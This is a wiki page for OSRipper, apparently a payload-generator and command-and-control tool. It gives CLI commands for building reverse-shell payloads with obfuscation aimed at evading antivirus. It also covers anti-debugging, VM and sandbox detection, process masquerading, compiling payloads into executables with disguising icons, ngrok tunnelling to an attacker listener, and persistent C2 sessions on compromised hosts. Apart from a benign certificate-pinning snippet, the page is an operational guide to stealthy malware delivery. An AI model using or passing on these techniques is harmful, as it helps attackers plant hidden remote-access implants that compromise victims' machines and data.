Advanced Features

noah edited this page Nov 15, 2025 · 1 revision

This guide covers advanced features and techniques for maximizing OSRipper's capabilities.

Obfuscation

OSRipper provides multiple levels of obfuscation to evade detection.

Standard Obfuscation

Multi-layer code encoding with randomized variables.

Features:

  • Variable name randomization
  • Code structure obfuscation
  • Base64 encoding layers
  • String encryption

Usage:

osripper-cli reverse -H IP -p PORT --obfuscate

Enhanced Obfuscation

Advanced obfuscation with additional evasion techniques.

Features:

  • All standard obfuscation features
  • Anti-debugging techniques
  • VM detection evasion
  • Junk code injection
  • Advanced code transformations

Usage:

osripper-cli reverse -H IP -p PORT --obfuscate --enhanced

Note: Enhanced obfuscation requires the --obfuscate flag.

How It Works

  1. Variable Randomization - Random variable names generated
  2. Code Encoding - Multiple encoding layers applied
  3. Structure Obfuscation - Code structure modified
  4. String Encryption - Strings encrypted/encoded
  5. Junk Code - Dummy code inserted (enhanced only)
  6. Anti-Debug - Debug detection code added (enhanced only)

Obfuscation Levels

Level      Features          Detection Rate
None       No obfuscation    High
Standard   Basic encoding    Medium
Enhanced   Full evasion      Low

Evasion Techniques

OSRipper implements multiple evasion techniques to avoid detection.

VM Detection

Detects virtual machines and sandboxes to avoid analysis.

Techniques:

  • CPU core count checking
  • MAC address validation
  • Process name detection
  • Registry checks (Windows)
  • System information analysis

Bypass (Testing):

osripper-cli doh -d domain.com --testing

Anti-Debugging

Prevents debugging and analysis.

Techniques:

  • Debugger detection
  • Process monitoring detection
  • Timing checks
  • Exception handling

Process Masquerading

Disguises the payload process as a legitimate system process.

Methods:

  • Process name spoofing
  • Parent process manipulation
  • Command-line argument masking

Stealth Delays

Random delays at startup to evade immediate execution monitoring.

Usage:

osripper-cli reverse -H IP -p PORT --delay

Delay Range: 5-15 seconds (configurable)

Signature Randomization

Every generated payload is unique:

  • Random variable names
  • Random code structure
  • Unique encoding keys
  • Variable obfuscation

Compilation

Compile Python payloads to standalone binaries for easier deployment.

Nuitka Compilation

OSRipper uses Nuitka for binary compilation.

Features:

  • Standalone executables
  • No Python interpreter required
  • Cross-platform support
  • Custom icons support

Usage:

osripper-cli reverse -H IP -p PORT --compile

Custom Icons

Add custom icons to compiled binaries.

Windows:

osripper-cli reverse -H IP -p PORT --compile --icon app.ico

macOS:

osripper-cli reverse -H IP -p PORT --compile --icon app.icns

Icon Requirements:

  • Windows: .ico format
  • macOS: .icns format
  • Linux: Not supported

Compilation Options

Platform-Specific:

  • Windows: .exe executable
  • macOS: .app bundle
  • Linux: Binary executable

Output Location:

  • Compiled binaries: results/payload.bin
  • Obfuscated source: results/payload_or.py

Compilation Process

  1. Source Preparation - Obfuscate if enabled
  2. Nuitka Compilation - Compile to binary
  3. Icon Injection - Add custom icon (if provided)
  4. Output - Save to results directory

Ngrok Integration

Use ngrok for dynamic IP addresses and port forwarding.

Setup

  1. Install Ngrok:

    # Download from ngrok.com
    # Extract and add to PATH
  2. Get API Key:

  3. Configure:

    ngrok config add-authtoken YOUR_AUTH_TOKEN

Usage

Generate Payload:

osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

Start Tunnel:

# In another terminal
ngrok tcp 4444

Get Tunnel Info:

  • OSRipper automatically detects the ngrok tunnel
  • Or manually enter the tunnel address when prompted

Benefits

  • Dynamic IP addresses
  • No port forwarding required
  • Easy testing
  • Quick deployment

Certificate Pinning

Secure HTTPS C2 with certificate pinning for authentication.

How It Works

  1. Certificate Generation - Server generates or uses certificate
  2. Fingerprint Extraction - SHA256 fingerprint extracted
  3. Payload Configuration - Fingerprint embedded in payload
  4. Validation - Agent validates certificate on connection
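The validation step above, shown as an added illustration of how fingerprint pinning is checked (this is not OSRipper's code; the host/port, the pin string formats accepted and the constructed SAMPLE_DER bytes are assumptions):

```python
import hashlib
import hmac
import socket
import ssl

# Constructed stand-in for a DER-encoded certificate; a real pin covers the real DER bytes.
SAMPLE_DER = b"constructed-stand-in-for-a-DER-certificate"


def normalize_fingerprint(fp: str) -> str:
    """Accept 'AB:CD:...', 'sha256 Fingerprint=AB:CD:...' or bare hex; return lowercase hex."""
    if "=" in fp:
        fp = fp.rsplit("=", 1)[1]
    return fp.replace(":", "").replace(" ", "").strip().lower()


def cert_fingerprint(der_cert: bytes) -> str:
    """SHA-256 over the DER encoding, the value openssl x509 -fingerprint -sha256 reports."""
    return hashlib.sha256(der_cert).hexdigest()


def pin_matches(der_cert: bytes, expected: str) -> bool:
    """Compare the presented certificate's fingerprint against the pin in constant time."""
    want = normalize_fingerprint(expected)
    if len(want) != 64:
        return False  # malformed or truncated pin: fail closed
    return hmac.compare_digest(cert_fingerprint(der_cert), want)


def connect_pinned(host: str, port: int, expected: str, timeout: float = 5.0) -> ssl.SSLSocket:
    """Open a TLS connection and refuse it unless the leaf certificate matches the pin.

    The pin is the trust anchor instead of the CA chain, so chain verification is
    disabled and the pin check is mandatory. Needs a live server; not run offline.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    tls = ctx.wrap_socket(socket.create_connection((host, port), timeout=timeout),
                          server_hostname=host)
    der = tls.getpeercert(binary_form=True)
    if der is None or not pin_matches(der, expected):
        tls.close()
        raise ssl.SSLError("certificate fingerprint does not match the pinned value")
    return tls
```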

Setup

  1. Start C2 Server with HTTPS:

     python -m osripper.c2.server example.com --https

  2. Get Certificate Fingerprint:

     curl http://localhost:5000/api/cert-fingerprint

  3. Generate Payload:

     • Via Web UI: Fingerprint auto-fills
     • Via CLI: Manually specify fingerprint

Benefits

  • MITM Protection - Prevents man-in-the-middle attacks
  • Authentication - Ensures connection to legitimate server
  • Security - Encrypted communication channel

Custom Certificates

Generate Certificate:

openssl req -x509 -newkey rsa:4096 \
  -keyout server.key \
  -out server.crt \
  -days 365 \
  -nodes

Use Custom Certificate:

python -m osripper.c2.server example.com \
  --https \
  --cert server.crt \
  --key server.key

Session Persistence

Maintain C2 connections across restarts and network changes.

How It Works

  1. Session ID Generation - Unique ID created per agent
  2. Local Storage - Session ID stored locally on agent
  3. Reconnection - Agent uses same session ID on restart
  4. Server Recognition - Server recognizes returning session

Session Storage

Agent Side:

  • Session ID stored in local file
  • Persists across reboots
  • Survives process termination

Server Side:

  • Session stored in database
  • Command history maintained
  • System information cached

Benefits

  • Persistence - Maintains connection across restarts
  • History - Command history preserved
  • Tracking - Track same system over time

Custom Payloads

Create custom payloads using the custom code crypter.

Requirements

  • Valid Python 3.6+ code
  • Self-contained (or include dependencies)
  • No hardcoded paths
  • Tested before obfuscation

Usage

osripper-cli custom --script mypayload.py \
  --obfuscate \
  --enhanced \
  --compile \
  --output custom_payload

Best Practices

  1. Test First - Test script before obfuscation
  2. Minimize Dependencies - Reduce external dependencies
  3. Error Handling - Include proper error handling
  4. Stealth - Avoid suspicious behavior
  5. Obfuscation - Always use obfuscation

Example Custom Payload

#!/usr/bin/env python3
import os
import subprocess

def main():
    # Your custom code here
    result = subprocess.run(['whoami'], capture_output=True)
    print(result.stdout.decode())

if __name__ == "__main__":
    main()

Obfuscate:

osripper-cli custom --script custom.py --obfuscate --enhanced --compile

Performance Optimization

Payload Size

Reduce Size:

  • Minimize dependencies
  • Remove unnecessary code
  • Use obfuscation efficiently

Compilation Speed

Faster Compilation:

  • Use standard obfuscation (faster than enhanced)
  • Skip compilation for testing
  • Use parallel compilation (Nuitka feature)

Runtime Performance

Optimize Execution:

  • Minimize startup code
  • Reduce initial delays
  • Optimize polling intervals

Advanced Configuration

Environment Variables

# Set custom paths
export OSRIPPER_RESULTS_DIR=/custom/path
export OSRIPPER_TMP_DIR=/custom/tmp

Configuration Files

Create custom configuration (future feature):

obfuscation:
  enhanced: true
  layers: 5

compilation:
  compiler: nuitka
  optimize: true

stealth:
  delay: true
  vm_detection: true

Troubleshooting Advanced Features

Obfuscation Issues

  • Large File Size: Reduce obfuscation layers
  • Syntax Errors: Test source code first
  • Import Errors: Ensure dependencies included

Compilation Issues

  • Nuitka Not Found: Install Nuitka (pip3 install nuitka)
  • Compilation Fails: Check system dependencies
  • Large Binary: Use optimization flags

Ngrok Issues

  • Tunnel Not Detected: Manually enter tunnel address
  • Connection Fails: Verify ngrok is running
  • Port Conflicts: Use different port

For more information, see the Usage Guide and Troubleshooting pages.
